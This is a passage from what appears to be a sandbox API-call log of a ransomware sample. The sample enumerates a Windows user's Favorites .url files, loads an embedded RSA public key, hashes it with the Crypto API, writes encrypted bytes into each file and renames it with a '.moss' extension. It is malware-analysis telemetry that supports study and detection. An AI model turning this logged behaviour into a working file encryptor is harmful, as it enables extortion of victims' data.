flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.333] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.333] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.334] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x85, lpOverlapped=0x0) returned 1 [0171.334] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.334] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0171.336] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.336] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.336] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.336] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.336] GetLastError () returned 0x0 [0171.336] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.336] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0171.336] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.336] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.336] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.336] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.336] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.336] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.337] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.337] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.337] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.338] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.moss")) returned 1 [0171.338] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.338] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.338] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.340] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.340] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0171.340] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned=".url" [0171.340] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.341] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=133) returned 1 [0171.341] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.344] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.344] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.345] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x85, lpOverlapped=0x0) returned 1 [0171.346] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.346] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0171.347] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.347] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.347] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.347] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.347] GetLastError () returned 0x0 [0171.347] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.347] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0171.347] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.347] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.347] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.347] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.347] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.347] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.347] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.348] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.348] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.348] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.moss")) returned 1 [0171.364] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.364] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.364] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.366] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.366] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0171.366] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned=".url" [0171.366] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.367] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=133) returned 1 [0171.367] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.373] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.373] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.374] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x85, lpOverlapped=0x0) returned 1 [0171.374] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.374] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0171.376] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.376] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.376] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.376] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.376] GetLastError () returned 0x0 [0171.376] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.376] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0171.376] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.376] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.376] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.376] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.376] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.376] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.377] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.377] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.377] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.377] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.moss")) returned 1 [0171.378] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.378] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.378] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.380] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0171.380] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned=".url" [0171.380] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.380] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=133) returned 1 [0171.380] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.384] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.384] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.384] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x85, lpOverlapped=0x0) returned 1 [0171.384] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.384] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0171.386] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.386] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.386] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.386] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.386] GetLastError () returned 0x0 [0171.386] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.386] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0171.386] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.386] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.386] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.386] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.386] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.386] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.387] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.387] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.387] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.387] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.moss")) returned 1 [0171.388] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.388] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.388] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.389] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.389] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0171.389] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned=".url" [0171.389] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.391] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=134) returned 1 [0171.391] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.394] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.394] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.395] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x86, lpOverlapped=0x0) returned 1 [0171.395] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.396] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0171.397] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.397] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.397] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.398] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.398] GetLastError () returned 0x0 [0171.398] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.398] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0171.398] HeapFree (in: 